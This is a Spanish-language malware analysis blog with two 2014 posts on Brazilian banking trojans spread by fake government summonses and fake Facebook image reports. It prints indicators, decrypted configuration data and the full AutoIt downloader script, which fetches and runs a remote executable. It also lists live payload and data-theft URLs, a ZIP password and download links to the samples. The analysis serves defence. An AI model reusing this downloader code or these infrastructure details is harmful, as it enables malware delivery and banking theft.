jueves, 27 de noviembre de 2014

Falsa Intimación : Intimacao de n. 9743872. O MINISTERIO PUBLICO FEDERAL‏

Hoy les traigo una amenaza que ataca a varias entidades bancarias de Brasil, mediante ingeniería social apelan a que desprevenidos descarguen una supuesta intimación del ministerio publico federal de Brasil. 

PROCEDIMENTO INVESTIGATÓRIO N.º 33781M. 




El link descarga un zip que en su interior contiene un CPL.

hxxp:// ecole.saintlumine.free.fr/ecolesaintlu/images/Federal.   php

hxxp:// w477408.blob4.ge.tt/streams/73TicN52/Intimacao-Federal.   zip



Analisis en Virus Total con un indice bajo en detecciones.




 0049CDB4 'olepro32.dll'
 0049E440 'ControlData'
 004A0B94 'sejafeliz02'
 004A0BA8 '\\Adobe.zip'
 004A0BBC '\\'
 004A0C88 ''
 004A0DBC '\\Adobe.zip'
 004A0DD0 '\\Runner.exe'
 004A0DE4 '\\borlndmm.dll'
 004A0DFC 'http://greatsteppes.com/1/images/winrt.jpg'



El downloader descarga un archivo del tipo jpg, que en realidad se trata de un ZIP con password.



Archivo ZIP

 004A0DFC 'http://greatsteppes.com/1/images/winrt.jpg'


Password 

 004A0B94 'sejafeliz02'




Analizamos el runner.exe y gbsite.dll que son cargan maliciosas en particular esta ultima.







Analizando el DLL se pueden observar que se trata de un screen overlay viendo sus formularios.


















Datos Ofuscados.


 00A56C34 'A948E60138382B1833D80D55FA31F229BD1425DE45E919C2D5698FBC74F222DA74EE6EEF02'




Se desencriptan como:

http://bandaluxuria.net/blog/upa.inf

En esta url se encuentra un archivo de configuracion del troyano

contienen estos datos ofuscados.

2903
2903
2903
DA19D716CF4023103CD30951FA7FA64A90DA17DB19DC1031B2B142F60C200422DC4093C5618AAD0521BF77DF7DC6D46D80BB7997413CE811C979FB3931F51CAF
0634F23DE455C8B55E89B6033EE60FC60B53E4016790568C9F46F1161529D20927DC7290EA18D263
D456D755


Que corresponden a:

0
0
0
http://ecole.saintlumine.free.fr/ecolesaintlu/images/notify.php
http://agsportualit.com/web/config1.txt
777


Desencriptor programado por mi para realizar esta tarea.



El PHP es donde se dirigen los datos robados.





Muestras: https://www.dropbox.com/s/3vj3igmnfuvn1lf/Intimacao%20de%20n.%209743872-malware-27-11-14.rar?dl=0


Eso es todo por el momento.

@Dkavalanche 2014







jueves, 13 de noviembre de 2014

Falsa denuncia de Imagen en Facebook.

Ayer se despacharon con una supuesta imagen que fue denunciada por inapropiada en Facebook.
El texto esta en portugués por lo que seguramente se trate, como en otras oportunidades, de un downloader de un troyano bancario brasileño.

Fw: Uma imagem postada em sua linha do tempo foi denunciada!‏

ATENÇÃO: Denúncia de imagem de caráter impróprio constando em sua linha do tempo.




El link descarga un ejecutable


Analizado en V.T. se puede observar un indice muy bajo en detecciones.



El binario esta compilado con Autoit, conteniendo un Script Ofuscado.


Utilizando la herramienta exe2aut llegamos al script que es el siguiente:




#Region
#EndRegion
If FileExists(@TempDir & chesdvgnqzaltbe("Q_hXg^e#ZmZ")) Then
FileDelete(@TempDir & chesdvgnqzaltbe("Q_hXg^e#ZmZ"))
EndIf
$urldownloader = chesdvgnqzaltbe("]iie/$$Xdbbjc^XVgZ#cZi#ZX$mbageX$XVX]Z$_hXg^e#ZmZ")
$directory = @TempDir & chesdvgnqzaltbe("Q_hXg^e#ZmZ")
InetGet($urldownloader, $directory)
$m01837778 = Sleep(10000)
$y98384632 = Sleep(10000)
Run($directory)
Sleep(9000)
FileDelete(@TempDir & chesdvgnqzaltbe("Q_hXg^e#ZmZ"))

Func chesdvgnqzaltbe($plsjkdmhgsfhjksiew)
Local $ifgewtqghstvbbjs
For $i = 1 To StringLen($plsjkdmhgsfhjksiew)
$ifgewtqghstvbbjs = $ifgewtqghstvbbjs & Chr(Asc(StringMid($plsjkdmhgsfhjksiew, $i, 1)) + 11)
Next
Return $ifgewtqghstvbbjs
EndFunc


Vemos que hay cadenas codificadas

]iie/$$Xdbbjc^XVgZ#cZi#ZX$mbageX$XVX]Z$_hXg^e#Zm
Q_hXg^e#ZmZ


La función chesdvgnqzaltbe es la encargada de decodificar la cadena haciendo una suma de 11 al valor ordinal del carácter.

Func chesdvgnqzaltbe($plsjkdmhgsfhjksiew)
Local $ifgewtqghstvbbjs
For $i = 1 To StringLen($plsjkdmhgsfhjksiew)
$ifgewtqghstvbbjs = $ifgewtqghstvbbjs & Chr(Asc(StringMid($plsjkdmhgsfhjksiew, $i, 1)) + 11)
Next
Return $ifgewtqghstvbbjs


Con un pequeño programa en Python podemos hacer este mismo trabajo.

import string

cadena =']iie/$$Xdbbjc^XVgZ#cZi#ZX$mbageX$XVX]Z$_hXg^e#ZmZ';

ca ='';
salida = '';


def sumab(string):
    data = []
    for k in xrange(len(string)):
            se = ord(string[k])
            xx = (se + 11)
            data += [chr(xx)]
    return data


salida = sumab(cadena);


for imprime in range(len(salida)):
    ca = ca + salida[imprime]
print ca


Por lo que las cadenas corresponden a lo siguiente:

]iie/$$Xdbbjc^XVgZ#cZi#ZX$mbageX$XVX]Z$_hXg^e#Zm

http://communicare.net.ec/xmlrpc/cache/jscrip.exe

Q_hXg^e#ZmZ

/jscrip.exe


Lamentablemente para nuestro analisis el sitio donde esta alojado el payload ha excedido el uso del ancho de banda.




Con el analisis dinámico llegamos a lo mismo.

Aquí una captura del trafico de red.



Muestra: https://www.dropbox.com/s/oubxld1jbo2e4f8/facebook%20malware%2012-11-14.rar


Eso es todo por el momento.

@Dkavalanche 2014

#Alerta #Malware CLARO  Tienes una factura sin pagar!  Factura #4489790 En el día de hoy se esta realizando una campaña de phishing que e...